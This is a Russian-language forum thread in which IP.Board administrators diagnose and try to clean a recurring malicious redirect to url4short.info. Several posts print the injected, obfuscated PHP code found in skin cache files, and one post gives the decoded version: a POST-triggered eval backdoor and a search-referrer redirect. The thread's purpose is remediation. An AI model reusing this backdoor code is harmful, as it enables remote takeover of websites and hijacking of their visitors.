Quasar Опубликовано 7 мая, 2014 Поделиться Опубликовано 7 мая, 2014 Проблема такая: При переходе на форум freedom-art с поисковиков(к примеру яндекс) перекидывает на _url4short.info/7de422bd (сайт на который льется наш трафик) Перекидывает всего один раз за сессию. Перелопатили все файлы, нечего подозрительного не нашли. Проверяли через хваленный AI-Bolit - тоже напрасно, он нечего не нашел. Для инфы, хостинг у нас не очень - ihc. Вроде бы убирали передаресация, а она все равно появилась, как - не знаем. Подозрение есть на хуки и модули, т.к. их многовато. Просьба помочь, т.к. трафик опять падет. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
lg29 Опубликовано 7 мая, 2014 Поделиться Опубликовано 7 мая, 2014 А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quasar Опубликовано 7 мая, 2014 Автор Поделиться Опубликовано 7 мая, 2014 А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего. Хост сказал, что все хорошо, файлов вредоносных нет. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
lg29 Опубликовано 7 мая, 2014 Поделиться Опубликовано 7 мая, 2014 Хост сказал, что все хорошо, файлов вредоносных нет. Напишите Платону посмотрим что ответит. А дальше видно будет что и как. И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quasar Опубликовано 8 мая, 2014 Автор Поделиться Опубликовано 8 мая, 2014 Напишите Платону посмотрим что ответит. А дальше видно будет что и как. И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум. "фридом арт" по этому запросу, т.е. главной страницы, в .htaccess редиректа нет. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quasar Опубликовано 8 мая, 2014 Автор Поделиться Опубликовано 8 мая, 2014 <IfModule mod_rewrite.c> Options -MultiViews RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteRule .(jpeg|jpg|gif|png|js)$ /public/404.php [NC,L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> .htacces так выглядит, Платон меня направил туда же, так же попросил сделать, что уже делал) Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
€ D-rA Опубликовано 8 мая, 2014 Поделиться Опубликовано 8 мая, 2014 Этот эффект не был ваш сайт, но ваш компьютер - вирус.Смотреть и скачать здесь removal tools Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
WOLF Опубликовано 8 мая, 2014 Поделиться Опубликовано 8 мая, 2014 что в index.php ? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quasar Опубликовано 8 мая, 2014 Автор Поделиться Опубликовано 8 мая, 2014 что в index.php ? <?php /** * <pre> * Invision Power Services * IP.Board v3.4.5 * Main public executable wrapper. * Set-up and load module to run * Last Updated: $Date: 2013-02-26 08:08:06 -0500 (Tue, 26 Feb 2013) $ * </pre> * * @author $Author: mark $ * @copyright (c) 2001 - 2009 Invision Power Services, Inc. * @license __www.invisionpower.com/company/standards.php#license * @package IP.Board * @link __www.invisionpower.com * @version $Rev: 12025 $ * */ define( 'IPB_THIS_SCRIPT', 'public' ); require_once( './initdata.php' );/*noLibHook*/ require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/ require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/ ipsController::run(); exit(); Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
WOLF Опубликовано 8 мая, 2014 Поделиться Опубликовано 8 мая, 2014 и либо в initdata.php либо же на форуме шел, и вам его стоит лечить айболитом __revisium.com/ai/ Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quasar Опубликовано 8 мая, 2014 Автор Поделиться Опубликовано 8 мая, 2014 и либо в initdata.php либо же на форуме шел, и вам его стоит лечить айболитом __revisium.com/ai/ форум лечили уже им Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
pcmist Опубликовано 23 января, 2015 Поделиться Опубликовано 23 января, 2015 (изменено) Такая же беда с пациентом 3.4.7 Выпали все странички из яшки. Написал Платону, на что был дан коротенький ответ В данный момент перенаправления происходят на ресурс url4short.info. Когда они будут устранены, страницы сайта вернутся в поиск автоматически. Копнул поиском и нашел таких проблем много. Добавлю сюда для инфы В кэш файл скина skin_global.php, а также и в кэш, расположенный в БД дописывается вот такой код: $k='b2488714339183624a45a9373ae8d945'; $mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq'; $jsa='jEK!u>WQ^CfRP98_%Xwtk&5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6'; $jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@'; $i='#c#'.substr($mds,213,1); $ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css'); Если его декодировать $i='ini_set'; if(function_exists($i)){ $i('display_errors',0); $i('log_errors',0); } if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k]))); $u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']); $f=@parse_url($_SERVER['HTTP_REFERER']); $c=@$f['host']; $r=@preg_match('#live.com|google.|yahoo.|bing.com|yandex.ru|rambler.ru|baidu.#i',$c); $h=$_SERVER['HTTP_HOST']; $b=$this->settings['cookie_id']; $g=$b.'session_id'; $e=$b.'lang_id'; $d=empty($_SERVER['HTTP_X_MOZ']); if(empty($_COOKIE[$e])){ if(isset($_GET['ipbv'])&&(!empty($_GET['g']))&&(!empty($_COOKIE[$g]))){ if($c==$h){ if($d)setcookie($e,'en',time()+36000); $m=substr(md5($h),0,8); print("document.location='__url4short.info/{$m}'"); } exit;} if((!$u)&&$r){$IPBHTML.="";} } Причем стоит обратить внимание, что куки записываются на 10 часов - 36000 секунд. Переходя из поиска к вам на сайт, пациента перекидывает на урл4шот.инфо Через 10 часов куки отваливаются и пациент будет заходить нормально. Решение: Очистить от ЛИШНЕГО кода указанного выше, в файле /cache/skin_cache/cacheid_1/skin_global.php Перестроить все кэши Внешний вид --->Инструменты Надеюсь решение кому то может. Изменено 23 января, 2015 пользователем pcmist sk0r, spoken, rustav и 1 другой 4 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
ferrete Опубликовано 3 февраля, 2015 Поделиться Опубликовано 3 февраля, 2015 У меня такой вариант: $pk='b16e523177731dcebff764b379878e77'; $rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l'; $pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&'; $pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m'; $f='%t%'.substr($rsa,718,1); $klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html'); Найти бы корень зла... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
pcmist Опубликовано 5 февраля, 2015 Поделиться Опубликовано 5 февраля, 2015 Пароли менять точно не стоит ни на админа, ни на базу. Один форум ради эксперимента оставил " не защищенным" и смотрю по логам что делают. 1. Они ищут название админки. Сменить название папки в обязательном порядке на 2857258927598275 или подобное. 2. Поставить права 444 на все файлы /cache/skin_cache/cacheid_1/skin_global.php (Во всех папках cacheid_1, cacheid_2 и т.д.) 3. Добавить в папку cache .htaccess со следующим содержанием. #<ipb-protection> <Files ~ "^.*.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)"> Order allow,deny Deny from all </Files> <Files ~ "^.*.(ipb)$"> Header set Content-Disposition attachment </Files> #</ipb-protection> Других вариантов я пока не нашел. Важно, при каких то изменениях со стилями(инструменты очистки, css, перестроении кэша) не забыть вернуть файлуфайлам, права обратно. Andross и AlexBrtn 2 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
ttindex Опубликовано 18 февраля, 2015 Поделиться Опубликовано 18 февраля, 2015 У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету. Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам. Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/ Quasar и AlexBrtn 2 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quasar Опубликовано 23 февраля, 2015 Автор Поделиться Опубликовано 23 февраля, 2015 У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету. Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам. Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/ Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
KitsuneSolar Опубликовано 23 февраля, 2015 Поделиться Опубликовано 23 февраля, 2015 Опять что ли дыра? оО Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
muslimgauze Опубликовано 24 февраля, 2015 Поделиться Опубликовано 24 февраля, 2015 Опять что ли дыра? оО Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила. скорее всего не "опять", а кто-то забыл старые дыры залатать или просто не успел Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
ttindex Опубликовано 24 февраля, 2015 Поделиться Опубликовано 24 февраля, 2015 Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. поддержка, аууууууу, поможет кто чем сможет? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
ttindex Опубликовано 3 марта, 2015 Поделиться Опубликовано 3 марта, 2015 в файле /cache/skin_cache/cacheid_1/skin_global.php был найден и удален следующий код: $pk='b5c742b518ce6244a2407ff3dd9c3fcc'; $rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l'; $pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&'; $pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m'; $f='%t%'.substr($rsa,718,1); $klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html'); После чего этот код удаляем и перестраиваем все стили Кеш. Пишем в яндекс чтобы перепроверили сайт. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
ttindex Опубликовано 4 марта, 2015 Поделиться Опубликовано 4 марта, 2015 Удалил данные строки из файла и все равно сегодня этот код появился в файле. Как быть? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
bluesmobil Опубликовано 22 июня, 2018 Поделиться Опубликовано 22 июня, 2018 Добрый день. Проблема актуально на 3.4.6 Убиваю код в файле skinglobal и кэше базы. перестраиваю кэши стиля. Сутки чисто. После, код появляется снова. Как решить проблему, хелп. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.